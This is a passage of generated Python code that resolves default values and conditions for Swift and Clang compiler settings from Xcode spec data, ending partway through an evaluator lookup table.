elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "SWIFT_OPTIMIZATION_LEVEL"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
eval_val_2 = ""
eval_key_2 = "SWIFT_COMPILATION_MODE"
if eval_key_2 in xcconfigs:
eval_val_2 = xcconfigs[eval_key_2]
used_user_content = True
elif eval_key_2 in id_configs:
opt = id_configs[eval_key_2]
if "DefaultValue" in opt:
(eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_2_used_user_content
return (used_user_content, (not eval_val_0 and eval_val_1 != "-Owholemodule" and eval_val_2 != "wholemodule"))
def _com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_BATCH_MODE__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_swift_compiler__SWIFT_DISABLE_SAFETY_CHECKS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_xcode_tools_swift_compiler__SWIFT_ENFORCE_EXCLUSIVE_ACCESS__DefaultValue(xcconfigs, id_configs):
# on
return (False, "on")
def _com_apple_xcode_tools_swift_compiler____SWIFT_ENFORCE_EXCLUSIVE_ACCESS_DEBUG_ENFORCEMENT_RELEASE__Condition(xcconfigs, id_configs):
# $(SWIFT_OPTIMIZATION_LEVEL) != '-Onone' && ($(SWIFT_ENFORCE_EXCLUSIVE_ACCESS) == 'full' || $(SWIFT_ENFORCE_EXCLUSIVE_ACCESS) == 'debug-only')
used_user_content = False
eval_val_0 = ""
eval_key_0 = "SWIFT_OPTIMIZATION_LEVEL"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "SWIFT_ENFORCE_EXCLUSIVE_ACCESS"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, (eval_val_0 != "-Onone" and (eval_val_1 == "full" or eval_val_1 == "debug-only")))
def _com_apple_xcode_tools_swift_compiler____SWIFT_ENFORCE_EXCLUSIVE_ACCESS_DEBUG_ENFORCEMENT_RELEASE__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_swift_compiler____SWIFT_ENFORCE_EXCLUSIVE_ACCESS_DEBUG_ENFORCEMENT_DEBUG__Condition(xcconfigs, id_configs):
# $(SWIFT_OPTIMIZATION_LEVEL) == '-Onone' && ($(SWIFT_ENFORCE_EXCLUSIVE_ACCESS) == 'full' || $(SWIFT_ENFORCE_EXCLUSIVE_ACCESS) == 'debug-only')
used_user_content = False
eval_val_0 = ""
eval_key_0 = "SWIFT_OPTIMIZATION_LEVEL"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "SWIFT_ENFORCE_EXCLUSIVE_ACCESS"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, (eval_val_0 == "-Onone" and (eval_val_1 == "full" or eval_val_1 == "debug-only")))
def _com_apple_xcode_tools_swift_compiler____SWIFT_ENFORCE_EXCLUSIVE_ACCESS_DEBUG_ENFORCEMENT_DEBUG__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_swift_compiler__SWIFT_SWIFT3_OBJC_INFERENCE__DefaultValue(xcconfigs, id_configs):
# Default
return (False, "Default")
def _com_apple_xcode_tools_swift_compiler__SWIFT_STDLIB__DefaultValue(xcconfigs, id_configs):
# swiftCore
return (False, "swiftCore")
def _com_apple_xcode_tools_swift_compiler__SWIFT_RESPONSE_FILE_PATH__DefaultValue(xcconfigs, id_configs):
# $(SWIFT_RESPONSE_FILE_PATH_$(variant)_$(arch))
used_user_content = False
eval_val_0 = ""
eval_key_0 = "variant"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "arch"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
eval_val_2 = ""
eval_key_2 = "SWIFT_RESPONSE_FILE_PATH_{eval_val_0}_{eval_val_1}".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1)
if eval_key_2 in xcconfigs:
eval_val_2 = xcconfigs[eval_key_2]
used_user_content = True
elif eval_key_2 in id_configs:
opt = id_configs[eval_key_2]
if "DefaultValue" in opt:
(eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_2_used_user_content
return (used_user_content, eval_val_2)
def _com_apple_xcode_tools_swift_compiler__SWIFT_DEPLOYMENT_TARGET__DefaultValue(xcconfigs, id_configs):
# $($(DEPLOYMENT_TARGET_SETTING_NAME))
used_user_content = False
eval_val_0 = ""
eval_key_0 = "DEPLOYMENT_TARGET_SETTING_NAME"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = eval_val_0
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, eval_val_1)
def _com_apple_xcode_tools_swift_compiler__SWIFT_TARGET_TRIPLE__DefaultValue(xcconfigs, id_configs):
# $(CURRENT_ARCH)-apple-$(SWIFT_PLATFORM_TARGET_PREFIX)$(SWIFT_DEPLOYMENT_TARGET)$(LLVM_TARGET_TRIPLE_SUFFIX)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CURRENT_ARCH"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "SWIFT_PLATFORM_TARGET_PREFIX"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
eval_val_2 = ""
eval_key_2 = "SWIFT_DEPLOYMENT_TARGET"
if eval_key_2 in xcconfigs:
eval_val_2 = xcconfigs[eval_key_2]
used_user_content = True
elif eval_key_2 in id_configs:
opt = id_configs[eval_key_2]
if "DefaultValue" in opt:
(eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_2_used_user_content
eval_val_3 = ""
eval_key_3 = "LLVM_TARGET_TRIPLE_SUFFIX"
if eval_key_3 in xcconfigs:
eval_val_3 = xcconfigs[eval_key_3]
used_user_content = True
elif eval_key_3 in id_configs:
opt = id_configs[eval_key_3]
if "DefaultValue" in opt:
(eval_val_3_used_user_content, eval_val_3) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_3_used_user_content
return (used_user_content, "{eval_val_0}-apple-{eval_val_1}{eval_val_2}{eval_val_3}".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1, eval_val_2 = eval_val_2, eval_val_3 = eval_val_3))
def _com_apple_xcode_tools_swift_compiler__SWIFT_VERSION__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_xcode_tools_swift_compiler__SWIFT_SERIALIZE_DEBUGGING_OPTIONS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_APP_EXTENSION__DefaultValue(xcconfigs, id_configs):
# $(APPLICATION_EXTENSION_API_ONLY)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "APPLICATION_EXTENSION_API_ONLY"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_swift_compiler__SWIFT_LINK_OBJC_RUNTIME__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_swift_compiler__CLANG_COVERAGE_MAPPING__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_xcode_tools_swift_compiler__CLANG_COVERAGE_MAPPING_LINKER_ARGS__DefaultValue(xcconfigs, id_configs):
# $(CLANG_COVERAGE_MAPPING)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_COVERAGE_MAPPING"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_swift_compiler__SWIFT_REFLECTION_METADATA_LEVEL__DefaultValue(xcconfigs, id_configs):
# all
return (False, "all")
def _com_apple_xcode_tools_swift_compiler__SWIFT_BITCODE_GENERATION_MODE__Condition(xcconfigs, id_configs):
# $(ENABLE_BITCODE) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_BITCODE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_xcode_tools_swift_compiler__SWIFT_BITCODE_GENERATION_MODE__DefaultValue(xcconfigs, id_configs):
# $(BITCODE_GENERATION_MODE)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "BITCODE_GENERATION_MODE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_swift_compiler__SWIFT_ADDRESS_SANITIZER__DefaultValue(xcconfigs, id_configs):
# $(ENABLE_ADDRESS_SANITIZER)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_ADDRESS_SANITIZER"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_swift_compiler__SWIFT_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY__Condition(xcconfigs, id_configs):
# $(SWIFT_ADDRESS_SANITIZER) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "SWIFT_ADDRESS_SANITIZER"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_xcode_tools_swift_compiler__SWIFT_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY__DefaultValue(xcconfigs, id_configs):
# $(ENABLE_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_swift_compiler__SWIFT_THREAD_SANITIZER__DefaultValue(xcconfigs, id_configs):
# $(ENABLE_THREAD_SANITIZER)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_THREAD_SANITIZER"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_TESTABILITY__DefaultValue(xcconfigs, id_configs):
# $(ENABLE_TESTABILITY)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_TESTABILITY"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_swift_compiler__SWIFT_SUPPRESS_WARNINGS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_xcode_tools_swift_compiler__SWIFT_TREAT_WARNINGS_AS_ERRORS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_xcode_tools_swift_compiler__SWIFT_INDEX_STORE_PATH__DefaultValue(xcconfigs, id_configs):
# $(INDEX_DATA_STORE_DIR)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "INDEX_DATA_STORE_DIR"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_swift_compiler__SWIFT_INDEX_STORE_ENABLE__Condition(xcconfigs, id_configs):
# $(COMPILER_INDEX_STORE_ENABLE) == YES || ( $(COMPILER_INDEX_STORE_ENABLE) == Default && $(SWIFT_OPTIMIZATION_LEVEL) == '-Onone' )
used_user_content = False
eval_val_0 = ""
eval_key_0 = "COMPILER_INDEX_STORE_ENABLE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "SWIFT_OPTIMIZATION_LEVEL"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, (eval_val_0 == "YES" or (eval_val_0 == "Default" and eval_val_1 == "-Onone")))
def _com_apple_xcode_tools_swift_compiler__SWIFT_INDEX_STORE_ENABLE__DefaultValue(xcconfigs, id_configs):
# $(INDEX_ENABLE_DATA_STORE)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "INDEX_ENABLE_DATA_STORE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_swift_compiler__SWIFT_EMIT_MODULE_INTERFACE__DefaultValue(xcconfigs, id_configs):
# $(BUILD_LIBRARY_FOR_DISTRIBUTION)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "BUILD_LIBRARY_FOR_DISTRIBUTION"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_LIBRARY_EVOLUTION__DefaultValue(xcconfigs, id_configs):
# $(BUILD_LIBRARY_FOR_DISTRIBUTION)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "BUILD_LIBRARY_FOR_DISTRIBUTION"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
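# The generated evaluators above all share a single lookup pattern: prefer the
# user's xcconfig value (and flag the result as user content), otherwise fall
# back to the option's registered DefaultValue evaluator. The hand-written
# sketch below is a hypothetical helper that is NOT part of the generated API;
# it only illustrates the pattern each `__DefaultValue` function expands to.
def _sketch_resolve_setting(key, xcconfigs, id_configs, evals):
    """Resolve `key` the way the generated evaluators do.

    Returns a (used_user_content, value) pair: the flag records whether the
    value came from the user's xcconfigs rather than a spec default.
    """
    if key in xcconfigs:
        # A user-supplied value wins outright.
        return (True, xcconfigs[key])
    opt = id_configs.get(key, {})
    if "DefaultValue" in opt:
        # Fall back to the DefaultValue evaluator registered under that name.
        return evals[opt["DefaultValue"]](xcconfigs, id_configs)
    # No user value and no default: empty string, not user content.
    return (False, "")
# For example, resolving SWIFT_OPTIMIZATION_LEVEL with no user override and a
# spec default of "-O" yields (False, "-O"), matching the generated function.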
XCSPEC_EVALS = {
"com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_CONTAINER_OVERFLOW__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_CONTAINER_OVERFLOW__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_CONTAINER_OVERFLOW__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_CONTAINER_OVERFLOW__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_USE_AFTER_SCOPE__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_USE_AFTER_SCOPE__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_USE_AFTER_SCOPE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_USE_AFTER_SCOPE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ALLOW_NON_MODULAR_INCLUDES_IN_FRAMEWORK_MODULES__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_ALLOW_NON_MODULAR_INCLUDES_IN_FRAMEWORK_MODULES__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_ALLOW_NON_MODULAR_INCLUDES_IN_FRAMEWORK_MODULES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ALLOW_NON_MODULAR_INCLUDES_IN_FRAMEWORK_MODULES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ARC_MIGRATE_EMIT_ERROR__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ARC_MIGRATE_EMIT_ERROR__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ARC_MIGRATE_PRECHECK__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ARC_MIGRATE_PRECHECK__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_BITCODE_GENERATION_MODE__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_BITCODE_GENERATION_MODE__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_BITCODE_GENERATION_MODE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_BITCODE_GENERATION_MODE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_COLOR_DIAGNOSTICS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_COLOR_DIAGNOSTICS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_COVERAGE_MAPPING_LINKER_ARGS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_COVERAGE_MAPPING_LINKER_ARGS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_COVERAGE_MAPPING__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_COVERAGE_MAPPING__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_COVERAGE_MAPPING__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_COVERAGE_MAPPING__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_CXX_LANGUAGE_STANDARD__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_CXX_LANGUAGE_STANDARD__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_CXX_LIBRARY__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_CXX_LIBRARY__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_DEBUG_INFORMATION_LEVEL__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_DEBUG_INFORMATION_LEVEL__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_DEBUG_INFORMATION_LEVEL__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_DEBUG_INFORMATION_LEVEL__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_DEBUG_MODULES__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_DEBUG_MODULES__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_DEBUG_MODULES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_DEBUG_MODULES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_APP_EXTENSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_APP_EXTENSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_CODE_COVERAGE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_CODE_COVERAGE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_CPP_STATIC_DESTRUCTORS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_CPP_STATIC_DESTRUCTORS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_MODULES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_MODULES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_MODULE_DEBUGGING__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_MODULE_DEBUGGING__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_MODULE_IMPLEMENTATION_OF__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_MODULE_IMPLEMENTATION_OF__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_MODULE_IMPLEMENTATION_OF__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_MODULE_IMPLEMENTATION_OF__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_OBJC_ARC__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_OBJC_ARC__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_OBJC_WEAK__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_OBJC_WEAK__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_INDEX_STORE_ENABLE__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_INDEX_STORE_ENABLE__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_INDEX_STORE_ENABLE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_INDEX_STORE_ENABLE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_INDEX_STORE_PATH__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_INDEX_STORE_PATH__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_INSTRUMENT_FOR_OPTIMIZATION_PROFILING__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_INSTRUMENT_FOR_OPTIMIZATION_PROFILING__DefaultValue,
